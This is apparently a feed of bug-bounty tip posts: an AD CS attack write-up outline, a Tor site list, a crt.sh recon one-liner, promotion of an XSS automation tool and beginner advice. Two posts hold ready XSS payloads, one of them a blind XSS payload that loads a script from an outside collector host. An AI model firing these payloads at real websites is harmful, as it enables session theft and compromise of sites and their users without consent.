Bug bounty Tips

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess This writeup is mainly to document my research into AD CS attacks and provide a source of knowledge for others to learn from.

   • Active Directory Certificate Services (AD CS): A Beautifully Vulnerable and Mis-configurable Mess
   • Introduction
   • Welcome to the Family: The ESC Family
   • ESC1 - Template Misconfiguration
   • ESC2 – Template Misconfiguration: Part II
   • ESC3 – Enrollment Agent Template Misconfiguration
   • ESC4 – Template Access Control Misconfiguration
   • ESC5 – PKI Objects Access Control
   • ESC6 – Arbitrary SAN Usage
   • ESC7 – CA Permissions Misconfiguration
   • ESC8 – NTLM Relay to AD CS HTTP Endpoints
   • ESC9 – No Security Extension
   • ESC10 – Weak Certificate Mappings
   • ESC11 – Relaying NTLM to ICPR
   • ESC12 – ADCS CA on YubiHSM
   • ESC13 - OID Group Link Abuse
   • Practical Exploitation
   • Enumeration
   • Exploitation of ESC1
   • Exploitation of ESC3
   • Exploitation of ESC4
   • Exploitation of ESC6
   • Exploitation of ESC7
   • Exploitation of ESC8
   • Exploitation of ESC9
   • Exploitation of ESC10
   • Exploitation of ESC11
   • Exploitation of ESC13
   • Conclusionj

https://twitter.com/Cipher0ps_tech/status/1809199297193476173?s=19 Check out this, it skyrocketing in my feed

Unpopular opinion👇 5 Dark website you don't know exist.📺🔎 Save it or lose it forever📌 ✅1. The CIA cia Access the CIA on Tor for anonymous communication, contact info, job listings, and more without being tracked. ✅2. Onion.name @theonion Get custom (.onion) domains that make sense for your dark web site, helping visitors easily identify your site. ✅3. BBC Tor Mirror @bbc Bypass country blocks with the BBC's Tor mirror, allowing anonymous access to it's website. ✅4. Elude Send and receive anonymous emails without needing personal info. Perfect for securely sharing sensitive information ✅5. Just another library @just_anotherlibrary Access a million books in over 40 categories, from fantasy novels to biographies. Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech #dark #darkweb #onion #website #top #cia #bbc #kali #kalilinux #tor #bug #bugbounty #bugbountytips #anonymous #book #information #job #hacking #hackingtools #trending #reels #trendingreels #viral #learnings https://www.instagram.com/reel/C9E_RJTSTP8/?igsh=MTc4MmM1YmI2Ng==

A quick one liner to get a list of domains associated with a target by using crt.sh! =================== curl -s 'crt.sh/?q=tesla.com&o…' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u =================== #bugbounty #bugbountytips #cybersecurity

I am looking for am viral video editor if anyone wants to work let me know places and do refer if anyone know from your frnds list

This is a thread on how to find the origin ip of a particular target

Tool tool tool😱 Check out this Auto_xss tool which alow you to automate the process from finding subdomains of a target to identifying xss vulnerability Ps Dm "AUTO" I will personally messege the tool link for you. Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech #tool #xss #hacking #hackingtools #bugbountytips #bugbounty #bug #infosec #cyber #cyberpunk #cybersecuritytips #auto #automation #target #cybersecurity #networking #network #trending #trend #reels #viral https://www.instagram.com/reel/C9EPMWnyAEE/?igsh=MTc4MmM1YmI2Ng==

It really works

Payloads ; RXSS : "mitsec<form/><!><details/open/ontoggle=alert(document.domain)>"@gmail.com BXSS : '"><script src=xss.report/c/username></script> #payload #bugbountytip

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background Payload : '%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o #bugbountytips #BugBounty #payload

The bounty ka tip👇 I wonder why some sys-admin configure the server with sudo privilages! . . 👉 Save this post for later and share it with your friends. 💬 Got questions? Drop them in the comments! 🔗 Check out the link in our bio for a detailed guide. Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech #cyber #cyberpunk #sys #sudo #sudouest #server #admin #hack #hacking #tip #tips #trick #kalilinux #tools #bug #bugbounty #bugbountytips #cybersecurity #cybersecuritytips https://www.instagram.com/p/C9Cad1jSO2J/?igsh=MTc4MmM1YmI2Ng==

chart of learning a bugbounty hunting/penetration testing for a begineers

❌Not even Einstein can remember all this so save it! Welcome, home🏡 Hunters today I am sharing. 🤔How to get started in BugBounty hunting. Here's are the things👇 1. Understanding what BugBounty is? 2. Develop your skills 3. Join BugBounty platforms 4. Start small and read pervious reports 5. Stay ethical and report responsibly Stay informed, stay secure! 💻🔐👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 🅱️ Visit for notes at book.cipheroos.xyz 🔨 Visit for my tool at github Auto_xss 📲 @cipherops.tech @hacker_hub8 @myself_immortal @cyber.techq @code_ravan @0xph03n1x0 #cyberpunk #kalilinux #bugbounty #bug #infosec #cybersecurity #cyber #beginner #getting #started #skill #skills #platforms #reporter #ethical #hacking #trending #trendingreels #post https://www.instagram.com/p/C8_1r9CSE7V/?igsh=MTc4MmM1YmI2Ng==

anyone know how to exploit this we can work together on reporting

I will update the code and share the tool link today

waybackurl results from my tool

updating my auto_xss tool checking if the files are already existed if yes then it will move to next tool then removed the gau and added Hakrawel, waybackurl and katana to find endpoints and combine all three results and sort it to one file in testing the updated tool will be in github verysoon if you guys want to give any suggestions with the changes you guys can

My first video, on how to install kali linux has been uploaded, please do check and let me know your thoughts